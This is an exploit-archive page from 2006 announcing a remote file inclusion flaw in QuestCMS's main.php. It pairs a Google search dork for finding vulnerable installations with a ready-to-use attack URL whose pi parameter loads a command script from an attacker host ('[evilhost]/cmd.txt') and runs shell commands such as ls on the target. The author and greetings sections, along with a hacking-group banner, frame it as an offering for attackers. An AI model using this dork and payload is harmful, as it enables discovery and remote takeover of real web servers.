QuestCMS (main.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : QuestCMS (main.php) Remote File Include Vulnerability
# Published : 2006-08-07
# Author : Crackers_Child
# Previous Title : NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion Vulnerabilities
# Next Title : YenerTurk Haber Script 1.0 Remote SQL Injection Vulnerability

!!!!!!!!!WWW.SYBERSAVASCYLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Questcms Remote File Include Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------
Affected software description :
--------------------------------------------------------------------------------
Application :  Questwork Web Content Management system (QuestCMS)
URL :  http://www.questwork.com

--------------------------------------------------------------------------------

dork        : allinurl:"/questcms/"
Exploit     :

--------------------------------------------------------------------------------

Usage:

http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd=ls

--------------------------------------------------------------------------------

greets:

X_ALPREN_X,Root_Mor and My Other Friends

--------------------------------------------------------------------------------



--------------------------------- [ WWW.SYBERSAVASCYLAR.COM ] --------------------------------------

# www.Syue.com [2006-08-07]